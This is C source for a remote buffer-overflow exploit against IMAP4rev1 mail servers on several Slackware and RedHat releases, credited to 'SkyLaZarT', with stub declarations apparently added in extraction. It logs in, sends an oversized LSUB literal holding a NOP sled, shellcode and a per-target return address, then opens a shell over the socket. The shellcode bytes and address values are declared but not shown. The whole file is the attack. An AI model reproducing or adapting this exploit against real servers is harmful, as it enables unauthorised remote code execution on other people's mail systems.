
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {char sin_addr; int sin_zero; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {char* h_addr; int h_length; } ;
typedef int sin ;


 int AF_INET ;
 int INIT (char*) ;
 char NOP ;
 int READ (int,char*) ;
 long RET12261 ;
 long RET12264 ;
 long RET12264ZOOT ;
 long RET2000_284 ;
 int SIGALRM ;
 int SIZE ;
 int SOCK_STREAM ;
 int TIMEOUT ;
 int alarm (int ) ;
 long atoi (char*) ;
 int bzero (int *,int) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 scalar_t__ debug ;
 int errno ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 int memcpy (char*,char*,int) ;
 int openshell (int,int) ;
 int perror (char*) ;
 int processSignal ;
 char* shellcode ;
 int signal (int ,int ) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,...) ;
 int stderr ;
 char* strerror (int ) ;
 int strlen (char*) ;
 int strstr (char*,char*) ;
 int write (int,char*,int) ;

int main(int argc, char **argv) {
 char buffer[SIZE], sockbuffer[2048];
 char *login, *password;
 long retaddr;
 struct sockaddr_in sin;
 struct hostent *hePtr;
 int sock, i;

 fprintf(stderr, "\nRemote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284\n"
  "Developed by SkyLaZarT - www.BufferOverflow.org\n\n");

 if ( argc < 5 ) {
  fprintf(stderr, "%s <host> <login> <password> <type> [offset]\n", argv[0]);
  fprintf(stderr, "\ttype: [0]\tSlackware 7.0 with IMAP4rev1 v12.261\n"
    "\ttype: [1]\tSlackware 7.1 with IMAP4rev1 v12.264\n"
    "\ttype: [2]\tRedHat 6.2 ZooT with IMAP4rev1 v12.264\n"
    "\ttype: [3]\tSlackware 7.0 with IMAP4rev1 2000.284\n\n");


  exit(-1);
 }

 login = argv[2];
 password = argv[3];

 switch(atoi(argv[4])) {
  case 0: retaddr = RET12261; break;
  case 1: retaddr = RET12264; break;
  case 2: retaddr = RET12264ZOOT; break;
  case 3: retaddr = RET2000_284; break;
  default:
   fprintf(stderr, "invalid type.. assuming default "
    "type 0\n");
   retaddr = RET12261; break;

 }

 if ( argc == 6 )
  retaddr += atoi(argv[5]);

 signal(SIGALRM, processSignal);

 fprintf(stderr, "Trying to exploit %s...\n", argv[1]);

 fprintf(stderr, "Using return address 0x%08lx. Shellcode size: %i bytes\n\n", retaddr, strlen(shellcode));


 alarm(TIMEOUT);
 hePtr = gethostbyname(argv[1]);
 if (!hePtr) {
  fprintf(stderr, "Unknow hostname : %s\n", strerror(errno));
  exit(-1);
 }
 alarm(0);

 sock = socket(AF_INET, SOCK_STREAM, 0);
 if ( sock < 0 ) {
  perror("socket()");
  exit(-1);
 }

 sin.sin_family = AF_INET;
 sin.sin_port = htons(143);
 memcpy(&sin.sin_addr, hePtr->h_addr, hePtr->h_length);
 bzero(&(sin.sin_zero), 8);

 fprintf(stderr, "Connecting... ");
 alarm(TIMEOUT);
 if ( connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0 ) {
  fprintf(stderr, "failed to %s:143\n", argv[1]);
  exit(-1);
 }
 alarm(0);

 fprintf(stderr, "OK\n");


        for ( i = 0; i <= SIZE; i += 4 )
                *(long *)&buffer[i] = retaddr;

        for ( i = 0; i < ( SIZE - strlen(shellcode) - 100); i++ )
                *(buffer+i) = NOP;

        memcpy(buffer + i, shellcode, strlen(shellcode));

 INIT(sockbuffer);
 READ(sock, sockbuffer);

 if(debug) fprintf(stderr, "debug %s", sockbuffer);

 fprintf(stderr, "Trying to loging ... ");

 sprintf(sockbuffer, "1 LOGIN %s %s\n", login, password);
 write(sock, sockbuffer, strlen(sockbuffer));

 INIT(sockbuffer);
 READ(sock, sockbuffer);

 if(debug) fprintf(stderr, "debug %s", sockbuffer);

 if (!(strstr(sockbuffer, "OK LOGIN completed"))) {
  fprintf(stderr, "Login failed!!\n");
  close(sock);
  exit(-1);
 }

 fprintf(stderr, "OK\n");

 INIT(sockbuffer);
 sprintf(sockbuffer, "1 LSUB \"\" {1064}\r\n");
 write(sock, sockbuffer, strlen(sockbuffer));

        INIT(sockbuffer);
        READ(sock, sockbuffer);

 if(debug) fprintf(stderr, "debug %s", sockbuffer);

 if(!(strstr(sockbuffer, "Ready"))) {
  fprintf(stderr, "LSUB command failed\n");
  close(sock);
  exit(-1);
 }

 fprintf(stderr, "Sending shellcode... ");

 write(sock, buffer, 1064);
 write(sock, "\r\n", 2);

 fprintf(stderr, "OK\n");

 fprintf(stderr, "PRESS ENTER for exploit status!!\n\n");

 openshell(sock, 1);

 close(sock);

 return 0;
}
